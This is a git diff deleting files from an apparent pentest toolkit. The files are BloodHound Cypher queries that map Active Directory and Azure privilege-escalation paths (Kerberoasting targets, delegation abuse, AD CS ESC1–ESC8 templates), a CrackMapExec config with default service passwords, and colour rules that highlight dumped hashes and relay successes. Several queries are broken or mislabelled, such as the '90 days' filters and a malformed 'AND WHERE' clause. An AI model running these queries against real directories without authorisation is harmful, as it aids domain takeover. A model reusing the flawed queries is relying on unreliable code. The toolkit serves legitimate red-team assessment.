[{ - "final": true, - "query": "MATCH p=shortestPath((c {owned: true})-[*1..3]->(s)) WHERE NOT c = s RETURN p" - }] - }, - { - "name": "Owned users with permissions against GPOs", - "category": "Tigers love pepper", - "queryList": [{ - "final": true, - "query": "MATCH p=(u:User {owned:true})-[r:AllExtendedRights|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|GpLink*1..]->(g:GPO) RETURN p" - }] - }, - { - "name": "Kerberoastable users with a path to DA", - "category": "They hate cinnamon", - "queryList": [{ - "final": true, - "query": "MATCH (u:User {hasspn:true}) MATCH (g:Group) WHERE g.objectid ENDS WITH '-512' MATCH p = shortestPath( (u)-[*1..]->(g) ) RETURN p" - }] - }, - { - "name": "Kerberoastable users with a path to High Value", - "category": "They hate cinnamon", - "queryList": [{ - "final": true, - "query": "MATCH (u:User {hasspn:true}),(n {highvalue:true}),p = shortestPath( (u)-[*1..]->(n) ) RETURN p" - }] - }, - { - "name": " Kerberoastable users and where they are AdminTo", - "category": "They hate cinnamon", - "queryList": [{ - "final": true, - "query": "OPTIONAL MATCH (u1:User) WHERE u1.hasspn=true OPTIONAL MATCH (u1)-[r:AdminTo]->(c:Computer) RETURN u" - }] - }, - { - "name": "Kerberoastable users who are members of high value groups", - "category": "They hate cinnamon", - "queryList": [{ - "final": true, - "query": "MATCH (u:User)-[r:MemberOf*1..]->(g:Group) WHERE g.highvalue=true AND u.hasspn=true RETURN u" - }] - }, - { - "name": "Kerberoastable users with passwords last set > 5 years ago", - "category": "They hate cinnamon", - "queryList": [{ - "final": true, - "query": "MATCH (u:User) WHERE n.hasspn=true AND WHERE u.pwdlastset < (datetime().epochseconds - (1825 * 86400)) and NOT u.pwdlastset IN [-1.0, 0.0] RETURN u" - }] - }, - { - "name": "Kerberoastable Users", - "category": "They hate cinnamon", - "queryList": [{ - "final": true, - "query": "MATCH (n:User)WHERE n.hasspn=true RETURN n", - "allowCollapse": false - }] - }, - { - "name": 
"AS-REProastable Users", - "category": "They hate cinnamon", - "queryList": [{ - "final": true, - "query": "MATCH (u:User {dontreqpreauth: true}) RETURN u" - }] - }, - { - "name": "Unconstrained Delegation systems", - "category": "Ready to let the dogs out?", - "queryList": [{ - "final": true, - "query": "MATCH (c {unconstraineddelegation:true}) return c" - }] - }, - { - "name": "Constrained Delegation systems", - "category": "Ready to let the dogs out?", - "queryList": [{ - "final": true, - "query": "MATCH p=(u)-[:AllowedToDelegate]->(c) RETURN p" - }] - }, - { - "name": "Unconstrained Delegation systems (without domain controllers)", - "category": "Ready to let the dogs out?", - "queryList": [{ - "final": true, - "query": "MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers RETURN c2" - }] - }, - { - "name": "(Warning: edits the DB) Mark unconstrained delegation systems as high value targets", - "category": "Ready to let the dogs out?", - "queryList": [{ - "final": true, - "query": "MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT(c1.name) AS domainControllers MATCH (c2 {unconstraineddelegation:true}) WHERE NOT c2.name IN domainControllers SET c2.highvalue = true RETURN c2" - }] - }, - { - "name": "Shortest paths from owned principals to unconstrained delegation systems", - "category": "Ready to let the dogs out?", - "queryList": [{ - "final": true, - "query": "MATCH (n {owned:true}) MATCH p=shortestPath((n)-[:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin|ReadGMSAPassword|HasSIDHistory|CanPSRemote*1..]->(m:Computer {unconstraineddelegation: true})) WHERE NOT n=m RETURN p" - }] - }, - { - 
"name": "Find computers with constrained delegation permissions and the corresponding targets where they allowed to delegate", - "category": "Ready to let the dogs out?", - "queryList": [{ - "final": true, - "query": "MATCH (c:Computer) WHERE c.allowedtodelegate IS NOT NULL RETURN c" - }] - }, - { - "name": "Find computers admin to other computers", - "category": "A nerdy hillbilly", - "queryList": [{ - "final": true, - "query": "MATCH p = (c1:Computer)-[r1:AdminTo]->(c2:Computer) RETURN p UNION ALL MATCH p = (c3:Computer)-[r2:MemberOf*1..]->(g:Group)-[r3:AdminTo]->(c4:Computer) RETURN p" - }] - }, - { - "name": "Logged in Admins", - "category": "A nerdy hillbilly", - "queryList": [{ - "final": true, - "query": "MATCH p=(a:Computer)-[r:HasSession]->(b:User) WITH a,b,r MATCH p=shortestPath((b)-[:AdminTo|MemberOf*1..]->(a)) RETURN p", - "allowCollapse": true - }] - }, - { - "name": "Users with local admin rights", - "category": "A nerdy hillbilly", - "queryList": [{ - "final": true, - "query": "MATCH p=(m:User)-[r:AdminTo]->(n:Computer) RETURN p" - }] - }, - { - "name": "Domain admin sessions", - "category": "A nerdy hillbilly", - "queryList": [{ - "final": true, - "query": "MATCH (n:User)-[:MemberOf]->(g:Group) WHERE g.objectid ENDS WITH '-512' MATCH p = (c:Computer)-[:HasSession]->(n) return p" - }] - }, - { - "name": "Users with adminCount, not sensitive for delegation, not members of Protected Users", - "category": "A nerdy hillbilly", - "queryList": [{ - "final": true, - "query": "MATCH (u)-[:MemberOf*1..]->(g:Group) WHERE g.objectid =~ \"(?i)S-1-5-.*-525\" WITH COLLECT (u.name) as protectedUsers MATCH p=(u2:User)-[:MemberOf*1..3]->(g2:Group) WHERE u2.admincount=true AND u2.sensitive=false AND NOT u2.name IN protectedUsers RETURN p" - }] - }, - { - "name": "Groups that contain the word 'admin'", - "category": "A one-man wolf pack", - "queryList": [{ - "final": true, - "query": "Match (n:Group) WHERE n.name CONTAINS 'ADMIN' RETURN n" - }] - }, - { - "name": 
"Groups of High Value Targets", - "category": "A one-man wolf pack", - "queryList": [{ - "final": true, - "query": "MATCH p=(n:User)-[r:MemberOf*1..]->(m:Group {highvalue:true}) RETURN p" - }] - }, - { - "name": "Non Admin Groups with High Value Privileges", - "category": "A one-man wolf pack", - "queryList": [{ - "final": true, - "query": "MATCH p=(g:Group)-[r:Owns|:WriteDacl|:GenericAll|:WriteOwner|:ExecuteDCOM|:GenericWrite|:AllowedToDelegate|:ForceChangePassword]->(n:Computer) WHERE NOT g.name CONTAINS 'ADMIN' RETURN p", - "allowCollapse": true - }] - }, - { - "name": "Groups with Computer and User Objects", - "category": "A one-man wolf pack", - "queryList": [{ - "final": true, - "query": "MATCH (c:Computer)-[r:MemberOf*1..]->(groupsWithComps:Group) WITH groupsWithComps MATCH (u:User)-[r:MemberOf*1..]->(groupsWithComps) RETURN DISTINCT(groupsWithComps) as groupsWithCompsAndUsers", - "allowCollapse": true, - "endNode": "{}" - }] - }, - { - "name": "Groups that can reset passwords (Warning: Heavy)", - "category": "A one-man wolf pack", - "queryList": [{ - "final": true, - "query": "MATCH p=(m:Group)-[r:ForceChangePassword]->(n:User) RETURN p" - }] - }, - { - "name": "Groups that have local admin rights (Warning: Heavy)", - "category": "A one-man wolf pack", - "queryList": [{ - "final": true, - "query": "MATCH p=(m:Group)-[r:AdminTo]->(n:Computer) RETURN p" - }] - }, - { - "name": "Users never logged on and account still active", - "category": "There are skittles in there!", - "queryList": [{ - "final": true, - "query": "MATCH (n:User) WHERE n.lastlogontimestamp=-1.0 AND n.enabled=TRUE RETURN n " - }] - }, - { - "name": "Users logged in the last 90 days", - "category": "There are skittles in there!", - "queryList": [{ - "final": true, - "query": "MATCH (u:User) WHERE u.lastlogon < (datetime().epochseconds - (90 * 86400)) and NOT u.lastlogon IN [-1.0, 0.0] RETURN u" - }] - }, - { - "name": "Users with passwords last set in the last 90 days", - "category": "There 
are skittles in there!", - "queryList": [{ - "final": true, - "query": "MATCH (u:User) WHERE u.pwdlastset < (datetime().epochseconds - (90 * 86400)) and NOT u.pwdlastset IN [-1.0, 0.0] RETURN u" - }] - }, - { - "name": "Find if unprivileged users have rights to add members into groups", - "category": "There are skittles in there!", - "queryList": [{ - "final": true, - "query": "MATCH (n:User {admincount:False}) MATCH p=allShortestPaths((n)-[r:AddMember*1..]->(m:Group)) RETURN p" - }] - }, - { - "name": "Find all users a part of the VPN group", - "category": "There are skittles in there!", - "queryList": [{ - "final": true, - "query": "Match p=(u:User)-[:MemberOf]->(g:Group) WHERE toUPPER (g.name) CONTAINS 'VPN' return p" - }] - }, - { - "name": "View all GPOs", - "category": "There are skittles in there!", - "queryList": [{ - "final": true, - "query": "Match (n:GPO) RETURN n" - }] - }, - { - "name": "Find if any domain user has interesting permissions against a GPO (Warning: Heavy)", - "category": "There are skittles in there!", - "queryList": [{ - "final": true, - "query": "MATCH p=(u:User)-[r:AllExtendedRights|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|GpLink*1..]->(g:GPO) RETURN p" - }] - }, - { - "name": "Can a user from domain ‘A ‘ do anything to any computer in domain ‘B’ (Warning: VERY Heavy)", - "category": "There are skittles in there!", - "queryList": [{ - "final": false, - "title": "Select source domain...", - "query": "MATCH (n:Domain) RETURN n.name ORDER BY n.name DESC" - }, - { - "final": false, - "title": "Select destination domain...", - "query": "MATCH (n:Domain) RETURN n.name ORDER BY n.name DESC" - }, - { - "final": true, - "query": "MATCH (n:User {domain: {result}}) MATCH (m:Computer {domain: {}}) MATCH 
p=allShortestPaths((n)-[r:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin*1..]->(m)) RETURN p", - "startNode": "{}", - "allowCollapse": false - } - ] - }, - { - "name": "Find all computers running with Windows XP", - "category": "It’s not illegal. It’s frowned upon", - "queryList": [{ - "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS 'XP' RETURN c" - }] - }, - { - "name": "Find all computers running with Windows 2000", - "category": "It’s not illegal. It’s frowned upon", - "queryList": [{ - "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS '2000' RETURN c" - }] - }, - { - "name": "Find all computers running with Windows 2003", - "category": "It’s not illegal. It’s frowned upon", - "queryList": [{ - "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS '2003' RETURN c" - }] - }, - { - "name": "Find all computers running with Windows 2008", - "category": "It’s not illegal. It’s frowned upon", - "queryList": [{ - "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS '2008' RETURN c" - }] - }, - { - "name": "Find all computers running with Windows Vista", - "category": "It’s not illegal. It’s frowned upon", - "queryList": [{ - "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS 'VISTA' RETURN c" - }] - }, - { - "name": "Find all computers running with Windows 7", - "category": "It’s not illegal. 
It’s frowned upon", - "queryList": [{ - "final": true, - "query": "MATCH (c:Computer) WHERE toUpper(c.operatingsystem) CONTAINS '7' RETURN c" - }] - }, - { - "name": "Top Ten Users with Most Sessions", - "category": "Not at the table Carlos!", - "queryList": [{ - "final": true, - "query": "MATCH (n:User),(m:Computer), (n)<-[r:HasSession]-(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH n, count(r) as rel_count order by rel_count desc LIMIT 10 MATCH p=(m)-[r:HasSession]->(n) RETURN p", - "allowCollapse": true - }] - }, - { - "name": "Top Ten Computers with Most Sessions", - "category": "Not at the table Carlos!", - "queryList": [{ - "final": true, - "query": "MATCH (n:User),(m:Computer), (n)<-[r:HasSession]-(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, count(r) as rel_count order by rel_count desc LIMIT 10 MATCH p=(m)-[r:HasSession]->(n) RETURN p", - "allowCollapse": true - }] - }, - { - "name": "Top Ten Users with Most Local Admin Rights", - "category": "Not at the table Carlos!", - "queryList": [{ - "final": true, - "query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH n, count(r) as rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) RETURN p", - "allowCollapse": true - }] - }, - { - "name": "Top Ten Computers with Most Admins and their admins", - "category": "Not at the table Carlos!", - "queryList": [{ - "final": true, - "query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, count(r) as rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) RETURN p", - "allowCollapse": true - }] - }, - { - "name": "Top Ten Computers with Most Admins", - "category": "Not at the table Carlos!", - "queryList": [{ - "final": true, - "query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' 
AND NOT n.name='' WITH m, count(r) as rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) RETURN m", - "allowCollapse": true - }] - }, - { - "name": "(Warning: edits the DB) Mark Top Ten Computers with Most Admins as HVT", - "category": "Not at the table Carlos!", - "queryList": [{ - "final": true, - "query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT n.name STARTS WITH 'ANONYMOUS LOGON' AND NOT n.name='' WITH m, count(r) as rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) SET m.highvalue = true RETURN m", - "allowCollapse": true - }] - }, - { - "name": "Top 20 nodes with most first degree object controls", - "category": "Not at the table Carlos!", - "queryList": [{ - "final": true, - "query": "MATCH p=(u)-[r1]->(n) WHERE r1.isacl = true WITH u, count(r1) AS count_ctrl ORDER BY count_ctrl DESC LIMIT 20 RETURN u", - "allowCollapse": true - }] - }, - { - "name": "Top ten nodes with most group delegated object controls", - "category": "Not at the table Carlos!", - "queryList": [{ - "final": true, - "query": "MATCH p=(u)-[r1:MemberOf*1..]->(g:Group)-[r2]->(n) WHERE r2.isacl=true WITH u, count(r2) AS count_ctrl ORDER BY count_ctrl DESC LIMIT 20 RETURN u", - "allowCollapse": true - }] - }, - { - "name": "Find machines Domain Users can RDP into", - "category": "We can’t find Doug", - "queryList": [{ - "final": true, - "query": "match p=(g:Group)-[:CanRDP]->(c:Computer) where g.objectid ENDS WITH '-513' return p" - }] - }, - { - "name": "Find Servers Domain Users can RDP To", - "category": "We can’t find Doug", - "queryList": [{ - "final": true, - "query": "match p=(g:Group)-[:CanRDP]->(c:Computer) where g.name STARTS WITH 'DOMAIN USERS' AND c.operatingsystem CONTAINS 'Server' return p", - "allowCollapse": true - }] - }, - { - "name": "Find what groups can RDP", - "category": "We can’t find Doug", - "queryList": [{ - "final": true, - "query": "MATCH p=(m:Group)-[r:CanRDP]->(n:Computer) RETURN p" - }] - }, - { - 
"name": "Return All Azure Users that are part of the ‘Global Administrator’ Role", - "category": "It's called a satchel", - "queryList": [{ - "final": true, - "query": "MATCH p =(n)-[r:AZGlobalAdmin*1..]->(m) RETURN p" - }] - }, - { - "name": "Return All On-Prem users with edges to Azure", - "category": "It's called a satchel", - "queryList": [{ - "final": true, - "query": "MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContributor|AZAddMembers|AZGlobalAdmin|AZVMContributor|AZOwnsAZAvereContributor]->(n) WHERE m.objectid CONTAINS 'S-1-5-21' RETURN p" - }] - }, - { - "name": "Find all paths to an Azure VM", - "category": "It's called a satchel", - "queryList": [{ - "final": true, - "query": "MATCH p = (n)-[r]->(g:AZVM) RETURN p" - }] - }, - { - "name": "Find all paths to an Azure KeyVault", - "category": "It's called a satchel", - "queryList": [{ - "final": true, - "query": "MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p" - }] - }, - { - "name": "Return All Azure Users and their Groups", - "category": "It's called a satchel", - "queryList": [{ - "final": true, - "query": "MATCH p=(m:AZUser)-[r:MemberOf]->(n) WHERE NOT m.objectid CONTAINS 'S-1-5' RETURN p" - }] - }, - { - "name": "Return All Azure AD Groups that are synchronized with On-Premise AD", - "category": "It's called a satchel", - "queryList": [{ - "final": true, - "query": "MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n" - }] - }, - { - "name": "Find all Privileged Service Principals", - "category": "It's called a satchel", - "queryList": [{ - "final": true, - "query": "MATCH p = (g:AZServicePrincipal)-[r]->(n) RETURN p" - }] - }, - { - "name": "Find all Owners of Azure Applications", - "category": "It's called a satchel", - "queryList": [{ - "final": true, - "query": "MATCH p = (n)-[r:AZOwns]->(g:AZApp) RETURN p" - }] - }, - { - "name": "Find all Certificate Templates", - "category": "Certificates", - "queryList": [{ - "final": true, - "query": 
"MATCH (n:GPO) WHERE n.type = 'Certificate Template' RETURN n" - }] - }, - { - "name": "Find enabled Certificate Templates", - "category": "Certificates", - "queryList": [{ - "final": true, - "query": "MATCH (n:GPO) WHERE n.type = 'Certificate Template' and n.Enabled = true RETURN n" - }] - }, - { - "name": "Find Certificate Authorities", - "category": "Certificates", - "queryList": [{ - "final": true, - "query": "MATCH (n:GPO) WHERE n.type = 'Enrollment Service' RETURN n" - }] - }, - { - "name": "Show Enrollment Rights for Certificate Template", - "category": "Certificates", - "queryList": [{ - "final": false, - "title": "Select a Certificate Template...", - "query": "MATCH (n:GPO) WHERE n.type = 'Certificate Template' RETURN n.name" - }, - { - "final": true, - "query": "MATCH p=(g)-[:Enroll|AutoEnroll]->(n:GPO {name:$result}) WHERE n.type = 'Certificate Template' return p", - "allowCollapse": false - }] - }, - { - "name": "Show Rights for Certificate Authority", - "category": "Certificates", - "queryList": [{ - "final": false, - "title": "Select a Certificate Authority...", - "query": "MATCH (n:GPO) WHERE n.type = 'Enrollment Service' RETURN n.name" - }, - { - "final": true, - "query": "MATCH p=(g)-[:ManageCa|ManageCertificates|Auditor|Operator|Read|Enroll]->(n:GPO {name:$result}) return p", - "allowCollapse": false - }] - }, - { - "name": "Find Misconfigured Certificate Templates (ESC1)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH (n:GPO) WHERE n.type = 'Certificate Template' and n.`Enrollee Supplies Subject` = true and n.`Client Authentication` = true and n.`Enabled` = true RETURN n" - }] - }, - { - "name": "Shortest Paths to Misconfigured Certificate Templates from Owned Principals (ESC1)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH p=allShortestPaths((g {owned:true})-[*1..]->(n:GPO)) WHERE g<>n and n.type = 'Certificate Template' and n.`Enrollee Supplies 
Subject` = true and n.`Client Authentication` = true and n.`Enabled` = true return p" - }] - }, - { - "name": "Find Misconfigured Certificate Templates (ESC2)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH (n:GPO) WHERE n.type = 'Certificate Template' and n.`Enabled` = true and (n.`Extended Key Usage` = [] or 'Any Purpose' IN n.`Extended Key Usage`) RETURN n" - }] - }, - { - "name": "Shortest Paths to Misconfigured Certificate Templates from Owned Principals (ESC2)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH p=allShortestPaths((g {owned:true})-[*1..]->(n:GPO)) WHERE g<>n and n.type = 'Certificate Template' and n.`Enabled` = true and (n.`Extended Key Usage` = [] or 'Any Purpose' IN n.`Extended Key Usage`) return p" - }] - }, - { - "name": "Find Enrollment Agent Templates (ESC3)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH (n:GPO) WHERE n.type = 'Certificate Template' and n.`Enabled` = true and (n.`Extended Key Usage` = [] or 'Any Purpose' IN n.`Extended Key Usage` or 'Certificate Request Agent' IN n.`Extended Key Usage`) RETURN n" - }] - }, - { - "name": "Shortest Paths to Enrollment Agent Templates from Owned Principals (ESC3)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH p=allShortestPaths((g {owned:true})-[*1..]->(n:GPO)) WHERE g<>n and n.type = 'Certificate Template' and n.`Enabled` = true and (n.`Extended Key Usage` = [] or 'Any Purpose' IN n.`Extended Key Usage` or 'Certificate Request Agent' IN n.`Extended Key Usage`) return p" - }] - }, - { - "name": "Shortest Paths to Vulnerable Certificate Template Access Control (ESC4)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH p=shortestPath((g)-[:GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner*1..]->(n:GPO)) WHERE g<>n and n.type = 'Certificate Template' and 
n.`Enabled` = true RETURN p" - }] - }, - { - "name": "Shortest Paths to Vulnerable Certificate Template Access Control from Owned Principals (ESC4)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH p=allShortestPaths((g {owned:true})-[r*1..]->(n:GPO)) WHERE g<>n and n.type = 'Certificate Template' and n.Enabled = true and NONE(x in relationships(p) WHERE type(x) = 'Enroll' or type(x) = 'AutoEnroll') return p" - }] - }, - { - "name": "Find Certificate Authorities with User Specified SAN (ESC6)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH (n:GPO) WHERE n.type = 'Enrollment Service' and n.`User Specified SAN` = 'Enabled' RETURN n" - }] - }, - { - "name": "Shortest Paths to Vulnerable Certificate Authority Access Control (ESC7)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH p=shortestPath((g)-[r:GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ManageCa|ManageCertificates*1..]->(n:GPO)) WHERE g<>n and n.type = 'Enrollment Service' RETURN p" - }] - }, - { - "name": "Shortest Paths to Vulnerable Certificate Authority Access Control from Owned Principals (ESC7)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH p=allShortestPaths((g {owned:true})-[*1..]->(n:GPO)) WHERE g<>n and n.type = 'Enrollment Service' and NONE(x in relationships(p) WHERE type(x) = 'Enroll' or type(x) = 'AutoEnroll') RETURN p" - }] - }, - { - "name": "Find Certificate Authorities with HTTP Web Enrollment (ESC8)", - "category": "AD CS Domain Escalation", - "queryList": [{ - "final": true, - "query": "MATCH (n:GPO) WHERE n.type = 'Enrollment Service' and n.`Web Enrollment` = 'Enabled' RETURN n" - }] - } - ] -} diff --git a/sources/crackmapexec/cme.conf b/sources/crackmapexec/cme.conf deleted file mode 100644 index 686183a8..00000000 --- a/sources/crackmapexec/cme.conf +++ /dev/null @@ -1,22 +0,0 @@ -[CME] 
-workspace = default -last_used_db = smb -pwn3d_label = admin - -[BloodHound] -bh_enabled = False -bh_uri = 127.0.0.1 -bh_port = 7687 -bh_user = neo4j -bh_pass = exegol4thewin - -[Empire] -api_host = 127.0.0.1 -api_port = 1337 -username = empireadmin -password = Password123! - -[Metasploit] -rpc_host = 127.0.0.1 -rpc_port = 55552 -password = abc123 \ No newline at end of file diff --git a/sources/grc/conf.cme b/sources/grc/conf.cme deleted file mode 100644 index 47576d23..00000000 --- a/sources/grc/conf.cme +++ /dev/null @@ -1,16 +0,0 @@ -# Signing True -regexp=signing\:True -colours=bold green -======= -# Signing False -regexp=signing\:False -colours=bold red -======= -# SMB1 True -regexp=SMBv1\:True -colours=yellow -======= -# SMBv1 False -regexp=SMBv1\:False -colours=blue -======= \ No newline at end of file diff --git a/sources/grc/conf.describeTicket b/sources/grc/conf.describeTicket deleted file mode 100644 index b8ee041d..00000000 --- a/sources/grc/conf.describeTicket +++ /dev/null @@ -1,28 +0,0 @@ -# GENERAL INFO -regexp=.*\[\*\].* -colours=blue -======= -# GENERAL WARNING -regexp=.*\[\!\].* -colours=yellow -======= -# GENERAL DEFAULT -regexp=.*\[\-\].* -colours=yellow -======= -# Kerberoast -regexp=.*krb5tgs.* -colours=yellow -======= -# UserName -regexp=.*User Name.* -colours=magenta -======= -# UserRealm -regexp=.*User Realm.* -colours=magenta -======= -# ServiceName -regexp=.*Service Name.* -colours=magenta -======= diff --git a/sources/grc/conf.getgpppassword b/sources/grc/conf.getgpppassword deleted file mode 100644 index b462e230..00000000 --- a/sources/grc/conf.getgpppassword +++ /dev/null @@ -1,36 +0,0 @@ -# GENERAL INFO -regexp=.*\[\*\].* -colours=blue -======= -# GENERAL WARNING -regexp=.*\[\!\].* -colours=yellow -======= -# GENERAL DEFAULT -regexp=.*\[\-\].* -colours=yellow -======= -# DEBUG SUCCESS -regexp=.*\[\+\] Found.* -colours=yellow -======= -# SUCCESS FOUND Files and directories -regexp=.*Found matching.* -colours=bold yellow -======= -# 
SUCCESS FOUND Username -regexp=.*newName.* -colours=green -======= -# SUCCESS FOUND Username -regexp=.*userName.* -colours=green -======= -# SUCCESS FOUND runAs -regexp=.*runAs.* -colours=green -======= -# SUCCESS FOUND Password -regexp=.*password.* -colours=bold green -======= \ No newline at end of file diff --git a/sources/grc/conf.krbrelayx b/sources/grc/conf.krbrelayx deleted file mode 100644 index 3d6cc4f8..00000000 --- a/sources/grc/conf.krbrelayx +++ /dev/null @@ -1,20 +0,0 @@ -# GENERAL INFO -regexp=.*\[\*\].* -colours=blue -======= -# GENERAL WARNING -regexp=.*\[\!\].* -colours=yellow -======= -# GENERAL DEFAULT -regexp=.*\[\-\].* -colours=yellow -======= -# SUCCESS Ticket decrypt -regexp=.*Ticket decrypt OK.* -colours=green -======= -# SUCCESS Saving ticket -regexp=.*Saving ticket.* -colours=green -======= \ No newline at end of file diff --git a/sources/grc/conf.ntlmrelayx b/sources/grc/conf.ntlmrelayx deleted file mode 100644 index ebe7cdfe..00000000 --- a/sources/grc/conf.ntlmrelayx +++ /dev/null @@ -1,88 +0,0 @@ -# GENERAL INFO -regexp=.*\[\*\].* -colours=blue -======= -# GENERAL WARNING -regexp=.*\[\!\].* -colours=yellow -======= -# GENERAL DEFAULT -regexp=.*\[\-\].* -colours=yellow -======= -# SUCCESS hashes -regexp=.{1,120}:\d{1,4}:[0-9a-fA-F]{32}:[0-9a-fA-F]{32}::: -colours=bold green -======= -# SUCCESS DCC2 -regexp=.*DCC2.* -colours=green -======= -# SUCCESS Machine Account Kerberos aes256 key -regexp=.{1,120}:aes256-cts-hmac-sha1-96:[0-9a-fA-F]{64} -colours=green -======= -# SUCCESS Machine Account Kerberos aes128 key -regexp=.{1,120}:aes128-cts-hmac-sha1-96:[0-9a-fA-F]{32} -colours=green -======= -# SUCCESS Machine Account Kerberos des key -regexp=.{1,120}:des-cbc-md5:[0-9a-fA-F]{16} -colours=green -======= -# SUCCESS Machine Account plaintext password hex -regexp=.{1,120}:plain_password_hex:[0-9a-fA-F]{1,600} -colours=green -======= -# SUCCESS Machine Account NTLM keys -regexp=.{1,120}[0-9a-fA-F]{32}:[0-9a-fA-F]{32} -colours=bold green 
-======= -# SUCCESS Authentication success -regexp=.*Authenticating.*SUCCEED.* -colours=green -======= -# AdminStatus TRUE for SOCKS -regexp=.*TRUE.* -colours=green -======= -# Adding new computer -regexp=.*Adding new computer.*OK.* -colours=green -======= -# can impersonate success -regexp=.*can now impersonate users on.* -colours=green -======= -# delegate access success -regexp=.*Delegation rights modified succesfully.* -colours=green -======= -# SUCCESS Replication-Get-Changes-All -regexp=.*Success! User.*now has Replication-Get-Changes-All privileges on the domain -colours=green -======= -# SUCCESS Privilege escalation succesful -regexp=.*Privilege escalation succesful.* -colours=green -======= -# SUCCESS Try using DCSync with secretsdump.py -regexp=.*Try using DCSync with secretsdump.py.* -colours=green -======= -# SUCCESS Adding user -regexp=.*Adding user:.*to group.*OK -colours=green -======= -# SUCCESS User privileges found -regexp=.*User privileges found:.* -colours=green -======= -# SUCCESS Saved certs -regexp=.*Saved.* -colours=green -======= -# SUCCESS Updated attr -regexp=.*Updated.* -colours=green -======= diff --git a/sources/grc/conf.rbcd b/sources/grc/conf.rbcd deleted file mode 100644 index 06786113..00000000 --- a/sources/grc/conf.rbcd +++ /dev/null @@ -1,28 +0,0 @@ -# GENERAL INFO -regexp=.*\[\*\].* -colours=blue -======= -# GENERAL WARNING -regexp=.*\[\!\].* -colours=yellow -======= -# GENERAL DEFAULT -regexp=.*\[\-\].* -colours=yellow -======= -# can impersonate success -regexp=.*can now impersonate users on.* -colours=green -======= -# delegate access success -regexp=.*Delegation rights modified succes.* -colours=green -======= -# delegate access success -regexp=.*can already impersonate users.* -colours=green -======= -# delegate access success -regexp=.*Delegation rights flushed succes.* -colours=green -======= \ No newline at end of file diff --git a/sources/grc/conf.secretsdump b/sources/grc/conf.secretsdump deleted file mode 100644 
index 36cc971d..00000000 --- a/sources/grc/conf.secretsdump +++ /dev/null @@ -1,44 +0,0 @@ -# GENERAL INFO -regexp=.*\[\*\].* -colours=blue -======= -# GENERAL WARNING -regexp=.*\[\!\].* -colours=yellow -======= -# GENERAL DEFAULT -regexp=.*\[\-\].* -colours=yellow -======= -# SUCCESS hashes -regexp=.{1,120}:\d{1,4}:[0-9a-fA-F]{32}:[0-9a-fA-F]{32}::: -colours=bold green -======= -# SUCCESS DCC2 -regexp=.*DCC2.* -colours=green -======= -# SUCCESS Machine Account Kerberos aes256 key -regexp=.{1,120}:aes256-cts-hmac-sha1-96:[0-9a-fA-F]{64} -colours=green -======= -# SUCCESS Machine Account Kerberos aes128 key -regexp=.{1,120}:aes128-cts-hmac-sha1-96:[0-9a-fA-F]{32} -colours=green -======= -# SUCCESS Machine Account Kerberos des key -regexp=.{1,120}:des-cbc-md5:[0-9a-fA-F]{16} -colours=green -======= -# SUCCESS Machine Account Kerberos rc4 key -regexp=.{1,120}:rc4_hmac:[0-9a-fA-F]{32} -colours=green -======= -# SUCCESS Machine Account plaintext password hex 